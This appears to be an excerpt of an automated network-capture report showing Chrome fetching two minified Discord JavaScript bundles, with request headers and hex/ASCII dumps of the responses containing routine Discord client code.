                                                                          309192.168.2.550045162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:17 UTC866OUTGET /assets/43820.2dfe02f35ae2675fa737.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=MKUNAH3EtHgfgcacqgcHLilQQq4JpElj.rnjuXE_uvk-1702226717072-0-604800000
                                                                          2023-12-10 16:45:18 UTC977INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 39 31 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 31 62 36 64 30 33 64 61 35 37 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:18 GMTContent-Type: application/javascriptContent-Length: 31916Connection: closeCF-Ray: 8336f51b6d03da57-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:18 UTC392INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 34 33 38 32 30 22 5d 2c 7b 33 35 34 30 38 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 69 2e 72 28 74 29 2c 69 2e 64 28 74 2c 7b 44 6f 6f 72 45 78 69 74 49 63 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 7d 29 3b 76 61 72 20 6e 3d 69 28 22 33 37 39 38 33 22 29 3b 69 28 22 38 38 34 36 39 31 22 29 3b 76 61 72 20 72 3d 69 28 22 36 36 39 34 39 31 22 29 2c 61 3d 69 28 22 37 35 31 39 36 22 29 3b 6c 65 74 20 75 3d 65 3d 3e 7b 6c 65 74 7b 77 69 64 74 68 3a 74 3d 32 34 2c 68 65 69
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["43820"],{354087:function(e,t,i){"use strict";i.r(t),i.d(t,{DoorExitIcon:function(){return u}});var n=i("37983");i("884691");var r=i("669491"),a=i("75196");let u=e=>{let{width:t=24,hei
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 77 69 64 74 68 3a 74 2c 68 65 69 67 68 74 3a 69 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 6e 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 75 3f 75 3a 75 2e 63 73 73 2c 64 3a 22 4d 39 20 31 32 61 31 20 31 20 30 20 30 20 31 20 31 20 31 76 32 61 31 20 31 20 30 20 31 20 31 2d 32 20 30 76 2d 32 61 31 20 31 20 30 20 30 20 31 20 31 2d 31 5a 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 73 7d 29 2c 28 30 2c 6e 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 75 3f 75 3a 75 2e 63 73 73 2c 66 69 6c 6c 52
                                                                          Data Ascii: w.w3.org/2000/svg",width:t,height:i,fill:"none",viewBox:"0 0 24 24",children:[(0,n.jsx)("path",{fill:"string"==typeof u?u:u.css,d:"M9 12a1 1 0 0 1 1 1v2a1 1 0 1 1-2 0v-2a1 1 0 0 1 1-1Z",className:s}),(0,n.jsx)("path",{fill:"string"==typeof u?u:u.css,fillR
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 4c 44 5f 4d 45 4d 42 45 52 3d 22 4e 45 57 5f 47 55 49 4c 44 5f 4d 45 4d 42 45 52 22 2c 72 2e 43 55 52 52 45 4e 54 5f 47 55 49 4c 44 5f 4d 45 4d 42 45 52 3d 22 43 55 52 52 45 4e 54 5f 47 55 49 4c 44 5f 4d 45 4d 42 45 52 22 2c 72 2e 49 4e 43 4c 55 44 45 44 5f 49 4e 5f 53 45 41 52 43 48 5f 52 45 53 55 4c 54 53 3d 22 49 4e 43 4c 55 44 45 44 5f 49 4e 5f 53 45 41 52 43 48 5f 52 45 53 55 4c 54 53 22 3b 63 6c 61 73 73 20 53 7b 72 65 73 65 74 28 29 7b 74 68 69 73 2e 5f 6d 65 6d 62 65 72 73 4d 61 70 2e 63 6c 65 61 72 28 29 2c 74 68 69 73 2e 5f 6d 65 6d 62 65 72 73 4d 61 70 3d 66 28 29 2c 74 68 69 73 2e 72 65 73 65 74 4e 65 77 4d 65 6d 62 65 72 54 69 6d 65 73 74 61 6d 70 28 29 7d 72 65 73 65 74 4e 65 77 4d 65 6d 62 65 72 54 69 6d 65 73 74 61 6d 70 28 29 7b 74 68 69
                                                                          Data Ascii: LD_MEMBER="NEW_GUILD_MEMBER",r.CURRENT_GUILD_MEMBER="CURRENT_GUILD_MEMBER",r.INCLUDED_IN_SEARCH_RESULTS="INCLUDED_IN_SEARCH_RESULTS";class S{reset(){this._membersMap.clear(),this._membersMap=f(),this.resetNewMemberTimestamp()}resetNewMemberTimestamp(){thi
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 41 63 63 6f 75 6e 74 41 63 74 69 76 69 74 79 3a 28 30 2c 6c 2e 69 73 53 70 61 6d 6d 65 72 29 28 65 29 7d 7d 63 72 65 61 74 65 4d 65 6d 62 65 72 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 6d 65 6d 62 65 72 73 4d 61 70 2e 73 65 74 28 65 2e 75 73 65 72 49 64 2c 65 29 7d 75 70 64 61 74 65 4d 65 6d 62 65 72 28 65 2c 74 29 7b 76 61 72 20 69 3b 69 66 28 6e 75 6c 6c 3d 3d 74 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 6d 65 6d 62 65 72 73 4d 61 70 2e 73 65 74 28 65 2e 75 73 65 72 49 64 2c 65 29 3b 6c 65 74 20 6e 3d 7b 2e 2e 2e 65 7d 2c 72 3d 7b 2e 2e 2e 74 7d 2c 61 3d 21 31 2c 7b 73 6f 75 72 63 65 49 6e 76 69 74 65 43 6f 64 65 3a 73 2c 68 61 73 55 6e 75 73 75 61 6c 44 6d 41 63 74 69 76 69 74 79 3a 6c 2c 68 61 73 55 6e 75 73 75 61 6c 41 63 63 6f 75 6e 74 41
                                                                          Data Ascii: AccountActivity:(0,l.isSpammer)(e)}}createMember(e){return this._membersMap.set(e.userId,e)}updateMember(e,t){var i;if(null==t)return this._membersMap.set(e.userId,e);let n={...e},r={...t},a=!1,{sourceInviteCode:s,hasUnusualDmActivity:l,hasUnusualAccountA
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 72 75 63 74 6f 72 28 65 29 7b 74 68 69 73 2e 6e 65 77 4d 65 6d 62 65 72 54 69 6d 65 73 74 61 6d 70 3d 44 61 74 65 2e 6e 6f 77 28 29 2b 32 65 33 2c 74 68 69 73 2e 67 75 69 6c 64 49 64 3d 65 2c 74 68 69 73 2e 5f 6d 65 6d 62 65 72 73 4d 61 70 3d 66 28 29 7d 7d 7d 2c 36 33 37 32 34 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 69 2e 72 28 74 29 2c 69 2e 64 28 74 2c 7b 47 75 69 6c 64 4d 65 6d 62 65 72 53 61 66 65 74 79 50 61 67 65 53 74 6f 72 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 69 28 22 32 32 32 30 30 37 22 29 2c 69 28 22 38 30 38 36 35 33 22 29 2c 69 28 22 34 32 34 39 37 33 22 29 3b 76 61 72 20 6e 3d 69 28 22 39 31 37 33 35 31 22 29 2c 72 3d 69 28 22 32 36 39 38 39 22 29 2c
                                                                          Data Ascii: ructor(e){this.newMemberTimestamp=Date.now()+2e3,this.guildId=e,this._membersMap=f()}}},637240:function(e,t,i){"use strict";i.r(t),i.d(t,{GuildMemberSafetyPageStore:function(){return o}}),i("222007"),i("808653"),i("424973");var n=i("917351"),r=i("26989"),
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 2e 67 65 74 50 61 67 69 6e 61 74 69 6f 6e 53 74 61 74 65 28 29 29 3a 30 7d 67 65 74 4d 65 6d 62 65 72 28 65 29 7b 76 61 72 20 74 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 74 68 69 73 2e 5f 6d 65 6d 62 65 72 73 26 26 74 68 69 73 2e 5f 69 6e 69 74 69 61 6c 69 7a 65 64 3f 6e 75 6c 6c 21 3d 3d 28 74 3d 74 68 69 73 2e 5f 6d 65 6d 62 65 72 73 2e 67 65 74 4d 65 6d 62 65 72 42 79 55 73 65 72 49 64 28 65 29 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 6e 75 6c 6c 3a 6e 75 6c 6c 7d 67 65 74 4d 65 6d 62 65 72 73 42 79 49 6e 64 65 78 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 74 68 69 73 2e 5f 6d 65 6d 62 65 72 73 26 26 74 68 69 73 2e 5f 69 6e 69 74 69 61 6c 69 7a 65 64 3f 5b 74 68 69 73 2e 5f 6d 65 6d 62 65 72 73 2e 76 61 6c 75 65 73 28 65 29 2c 74 68 69
                                                                          Data Ascii: .getPaginationState()):0}getMember(e){var t;return null!=this._members&&this._initialized?null!==(t=this._members.getMemberByUserId(e))&&void 0!==t?t:null:null}getMembersByIndex(e){return null!=this._members&&this._initialized?[this._members.values(e),thi
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 29 3b 69 66 28 6e 75 6c 6c 3d 3d 6e 29 7b 69 3d 21 30 3b 6c 65 74 20 61 3d 72 2e 64 65 66 61 75 6c 74 2e 67 65 74 54 72 75 65 4d 65 6d 62 65 72 28 74 68 69 73 2e 67 75 69 6c 64 49 64 2c 65 29 3b 69 66 28 6e 75 6c 6c 3d 3d 61 29 72 65 74 75 72 6e 5b 21 31 2c 21 31 5d 3b 6e 3d 74 68 69 73 2e 5f 6d 65 6d 62 65 72 73 2e 65 6e 68 61 6e 63 65 4e 65 77 4d 65 6d 62 65 72 28 61 2c 74 29 7d 69 66 28 6e 75 6c 6c 3d 3d 74 2e 69 73 49 6e 63 6c 75 64 65 64 49 6e 53 65 61 72 63 68 52 65 73 75 6c 74 73 29 7b 6c 65 74 5b 65 2c 72 5d 3d 74 68 69 73 2e 5f 67 65 74 49 73 49 6e 63 6c 75 64 65 64 49 6e 53 65 61 72 63 68 28 6e 2c 74 29 3b 72 26 26 28 69 3d 21 30 2c 74 2e 69 73 49 6e 63 6c 75 64 65 64 49 6e 53 65 61 72 63 68 52 65 73 75 6c 74 73 3d 65 29 7d 65 6c 73 65 20 74 2e
                                                                          Data Ascii: );if(null==n){i=!0;let a=r.default.getTrueMember(this.guildId,e);if(null==a)return[!1,!1];n=this._members.enhanceNewMember(a,t)}if(null==t.isIncludedInSearchResults){let[e,r]=this._getIsIncludedInSearch(n,t);r&&(i=!0,t.isIncludedInSearchResults=e)}else t.
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 74 65 53 65 61 72 63 68 65 64 4d 65 6d 62 65 72 73 42 79 4d 65 6d 62 65 72 49 64 73 28 65 29 7b 69 66 28 6e 75 6c 6c 3d 3d 74 68 69 73 2e 5f 73 65 61 72 63 68 7c 7c 6e 75 6c 6c 3d 3d 74 68 69 73 2e 5f 6d 65 6d 62 65 72 73 7c 7c 21 74 68 69 73 2e 5f 69 6e 69 74 69 61 6c 69 7a 65 64 29 72 65 74 75 72 6e 21 31 3b 6c 65 74 20 74 3d 65 2e 72 65 64 75 63 65 28 28 65 2c 74 29 3d 3e 7b 6c 65 74 20 69 3d 72 2e 64 65 66 61 75 6c 74 2e 67 65 74 54 72 75 65 4d 65 6d 62 65 72 28 74 68 69 73 2e 67 75 69 6c 64 49 64 2c 74 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 69 26 26 65 2e 70 75 73 68 28 69 29 2c 65 7d 2c 5b 5d 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 75 70 64 61 74 65 43 6c 69 65 6e 74 4d 65 6d 62 65 72 73 28 74 2c 74 68 69 73 2e 5f 73 65 61 72 63 68 2e 72 65
                                                                          Data Ascii: teSearchedMembersByMemberIds(e){if(null==this._search||null==this._members||!this._initialized)return!1;let t=e.reduce((e,t)=>{let i=r.default.getTrueMember(this.guildId,t);return null!=i&&e.push(i),e},[]);return this.updateClientMembers(t,this._search.re
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 69 66 28 6e 75 6c 6c 3d 3d 74 68 69 73 2e 5f 6d 65 6d 62 65 72 73 7c 7c 6e 75 6c 6c 3d 3d 74 68 69 73 2e 5f 73 65 61 72 63 68 7c 7c 21 74 68 69 73 2e 5f 69 6e 69 74 69 61 6c 69 7a 65 64 29 72 65 74 75 72 6e 21 31 3b 6c 65 74 20 74 3d 21 21 74 68 69 73 2e 5f 73 65 61 72 63 68 2e 68 61 73 44 65 66 61 75 6c 74 51 75 65 72 79 2c 69 3d 74 68 69 73 2e 5f 73 65 61 72 63 68 2e 75 70 64 61 74 65 53 65 61 72 63 68 53 74 61 74 65 28 65 29 3b 69 66 28 74 68 69 73 2e 5f 73 65 61 72 63 68 2e 68 61 73 44 65 66 61 75 6c 74 51 75 65 72 79 26 26 74 29 72 65 74 75 72 6e 20 74 68 69 73 2e 75 70 64 61 74 65 50 61 67 69 6e 61 74 69 6f 6e 43 68 75 6e 6b 73 28 29 3b 6c 65 74 20 72 3d 28 30 2c 6e 2e 63 6c 6f 6e 65 44 65 65 70 29 28 74 68 69 73 2e 5f 6d 65 6d 62 65 72 73 2e 76 61
                                                                          Data Ascii: if(null==this._members||null==this._search||!this._initialized)return!1;let t=!!this._search.hasDefaultQuery,i=this._search.updateSearchState(e);if(this._search.hasDefaultQuery&&t)return this.updatePaginationChunks();let r=(0,n.cloneDeep)(this._members.va


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          310192.168.2.550046162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:17 UTC865OUTGET /assets/6086.1339c227c38e3c5b2586.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=MKUNAH3EtHgfgcacqgcHLilQQq4JpElj.rnjuXE_uvk-1702226717072-0-604800000
                                                                          2023-12-10 16:45:18 UTC1124INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 33 30 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 31 63 32 64 64 63 32 38 38 34 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:18 GMTContent-Type: application/javascriptContent-Length: 19306Connection: closeCF-Ray: 8336f51c2ddc2884-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 36 30 38 36 22 5d 2c 7b 35 31 39 37 30 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 2c 6e 28 22 32 32 32 30 30 37 22 29 2c 6e 28 22 37 30 32 39 37 36 22 29 3b 76 61 72 20 61 3d 6e 28 22 38 37 32 37 31 37 22 29 2c 6c 3d 6e 28 22 38 31 39 38 35 35 22 29 2c 69 3d 6e 28 22 39 31 33 31 34 34 22 29 2c 64 3d 6e 28 22 36 37 39 34 32 38 22 29 2c 73 3d 6e 28 22 32 38 32 31 30
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["6086"],{519705:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return c}}),n("222007"),n("702976");var a=n("872717"),l=n("819855"),i=n("913144"),d=n("679428"),s=n("28210
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 63 74 2e 65 6e 74 72 69 65 73 28 65 29 2e 66 6f 72 45 61 63 68 28 65 3d 3e 7b 6c 65 74 5b 6e 2c 6c 5d 3d 65 2c 64 3d 61 2e 67 65 74 28 6e 29 3b 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 55 53 45 52 5f 47 55 49 4c 44 5f 53 45 54 54 49 4e 47 53 5f 47 55 49 4c 44 5f 55 50 44 41 54 45 22 2c 67 75 69 6c 64 49 64 3a 6e 2c 73 65 74 74 69 6e 67 73 3a 6c 7d 29 2c 28 30 2c 6f 2e 74 72 61 63 6b 47 75 69 6c 64 4e 6f 74 69 66 69 63 61 74 69 6f 6e 53 65 74 74 69 6e 67 73 55 70 64 61 74 65 29 28 6e 2c 6c 2c 64 2c 74 29 7d 29 7d 2c 75 70 64 61 74 65 43 68 61 6e 6e 65 6c 4f 76 65 72 72 69 64 65 53 65 74 74 69 6e 67 73 28 65 2c 74 2c 6e 2c 61 29 7b 6c 65 74 20 73 3d 28 30 2c 6f 2e 67 65 74 43 75 72 72 65 6e 74 43 68 61 6e 6e 65 6c 53 65
                                                                          Data Ascii: ct.entries(e).forEach(e=>{let[n,l]=e,d=a.get(n);i.default.dispatch({type:"USER_GUILD_SETTINGS_GUILD_UPDATE",guildId:n,settings:l}),(0,o.trackGuildNotificationSettingsUpdate)(n,l,d,t)})},updateChannelOverrideSettings(e,t,n,a){let s=(0,o.getCurrentChannelSe
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 72 2e 73 65 74 46 6c 61 67 29 28 6e 2c 65 2c 74 29 3b 61 2e 64 65 66 61 75 6c 74 2e 70 61 74 63 68 28 7b 75 72 6c 3a 75 2e 45 6e 64 70 6f 69 6e 74 73 2e 41 43 43 4f 55 4e 54 5f 4e 4f 54 49 46 49 43 41 54 49 4f 4e 5f 53 45 54 54 49 4e 47 53 2c 62 6f 64 79 3a 7b 66 6c 61 67 73 3a 6c 7d 7d 29 7d 7d 7d 2c 34 31 32 33 35 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 75 70 64 61 74 65 47 75 69 6c 64 53 65 6c 66 4d 65 6d 62 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 29 2c 6e 28 22 37 30 32 39 37 36 22 29 3b 76 61 72 20 61 3d 6e 28 22 38 37 32 37 31 37 22 29 2c 6c 3d 6e 28 22 39 31 33 31 34 34 22 29 2c 69 3d 6e 28 22 34 37 39 37 35 36 22 29 2c 64
                                                                          Data Ascii: r.setFlag)(n,e,t);a.default.patch({url:u.Endpoints.ACCOUNT_NOTIFICATION_SETTINGS,body:{flags:l}})}}},412355:function(e,t,n){"use strict";n.r(t),n.d(t,{updateGuildSelfMember:function(){return r}}),n("702976");var a=n("872717"),l=n("913144"),i=n("479756"),d
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 69 6e 63 6c 75 64 65 73 28 65 2e 69 64 29 29 29 2e 66 6c 61 74 28 29 2c 69 3d 7b 7d 2c 72 3d 7b 7d 3b 72 65 74 75 72 6e 28 6e 2e 66 6f 72 45 61 63 68 28 65 3d 3e 7b 69 5b 65 2e 69 64 5d 3d 44 61 74 65 2e 6e 6f 77 28 29 2c 65 2e 6f 70 74 69 6f 6e 73 2e 66 6f 72 45 61 63 68 28 65 3d 3e 72 5b 65 2e 69 64 5d 3d 44 61 74 65 2e 6e 6f 77 28 29 29 7d 29 2c 74 29 3f 64 2e 64 65 66 61 75 6c 74 2e 70 6f 73 74 28 7b 75 72 6c 3a 47 2e 45 6e 64 70 6f 69 6e 74 73 2e 47 55 49 4c 44 5f 4f 4e 42 4f 41 52 44 49 4e 47 5f 52 45 53 50 4f 4e 53 45 53 28 65 29 2c 62 6f 64 79 3a 7b 6f 6e 62 6f 61 72 64 69 6e 67 5f 72 65 73 70 6f 6e 73 65 73 3a 6c 2e 6d 61 70 28 65 3d 3e 65 2e 69 64 29 2c 6f 6e 62 6f 61 72 64 69 6e 67 5f 70 72 6f 6d 70 74 73 5f 73 65 65 6e 3a 69 2c 6f 6e 62 6f 61
                                                                          Data Ascii: includes(e.id))).flat(),i={},r={};return(n.forEach(e=>{i[e.id]=Date.now(),e.options.forEach(e=>r[e.id]=Date.now())}),t)?d.default.post({url:G.Endpoints.GUILD_ONBOARDING_RESPONSES(e),body:{onboarding_responses:l.map(e=>e.id),onboarding_prompts_seen:i,onboa
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 61 75 6c 74 2e 67 65 74 53 65 6c 66 4d 65 6d 62 65 72 28 65 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 72 6f 6c 65 73 29 26 26 76 6f 69 64 20 30 21 3d 3d 69 3f 69 3a 5b 5d 3b 69 66 28 67 2e 64 65 66 61 75 6c 74 2e 69 73 56 69 65 77 69 6e 67 52 6f 6c 65 73 28 65 29 29 7b 28 30 2c 66 2e 75 70 64 61 74 65 49 6d 70 65 72 73 6f 6e 61 74 65 64 52 6f 6c 65 73 29 28 65 2c 6c 2e 64 69 66 66 65 72 65 6e 63 65 28 6c 2e 75 6e 69 6f 6e 28 64 2c 74 29 2c 6e 29 29 3b 72 65 74 75 72 6e 7d 28 74 2e 6c 65 6e 67 74 68 3e 30 7c 7c 6e 2e 6c 65 6e 67 74 68 3e 30 29 26 26 73 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 47 55 49 4c 44 5f 4d 45 4d 42 45 52 5f 55 50 44 41 54 45 5f 4c 4f 43 41 4c 22 2c 67 75 69 6c 64 49 64
                                                                          Data Ascii: ault.getSelfMember(e))||void 0===a?void 0:a.roles)&&void 0!==i?i:[];if(g.default.isViewingRoles(e)){(0,f.updateImpersonatedRoles)(e,l.difference(l.union(d,t),n));return}(t.length>0||n.length>0)&&s.default.dispatch({type:"GUILD_MEMBER_UPDATE_LOCAL",guildId
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 61 74 65 64 44 61 74 61 29 28 65 2c 7b 6f 70 74 49 6e 45 6e 61 62 6c 65 64 3a 21 30 7d 29 2c 28 30 2c 66 2e 75 70 64 61 74 65 49 6d 70 65 72 73 6f 6e 61 74 65 64 52 6f 6c 65 73 29 28 65 2c 41 72 72 61 79 2e 66 72 6f 6d 28 6c 29 29 3b 6c 65 74 20 74 3d 45 2e 64 65 66 61 75 6c 74 2e 67 65 74 43 75 72 72 65 6e 74 55 73 65 72 28 29 3b 69 66 28 6e 75 6c 6c 21 3d 74 29 7b 76 61 72 20 46 2c 79 3b 6c 65 74 20 6e 3d 6e 75 6c 6c 21 3d 3d 28 79 3d 6e 75 6c 6c 3d 3d 3d 28 46 3d 70 2e 64 65 66 61 75 6c 74 2e 67 65 74 4d 65 6d 62 65 72 28 65 2c 74 2e 69 64 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 46 3f 76 6f 69 64 20 30 3a 46 2e 66 6c 61 67 73 29 26 26 76 6f 69 64 20 30 21 3d 3d 79 3f 79 3a 30 3b 28 30 2c 66 2e 75 70 64 61 74 65 49 6d 70 65 72 73 6f 6e 61 74 65 64 44 61
                                                                          Data Ascii: atedData)(e,{optInEnabled:!0}),(0,f.updateImpersonatedRoles)(e,Array.from(l));let t=E.default.getCurrentUser();if(null!=t){var F,y;let n=null!==(y=null===(F=p.default.getMember(e,t.id))||void 0===F?void 0:F.flags)&&void 0!==y?y:0;(0,f.updateImpersonatedDa
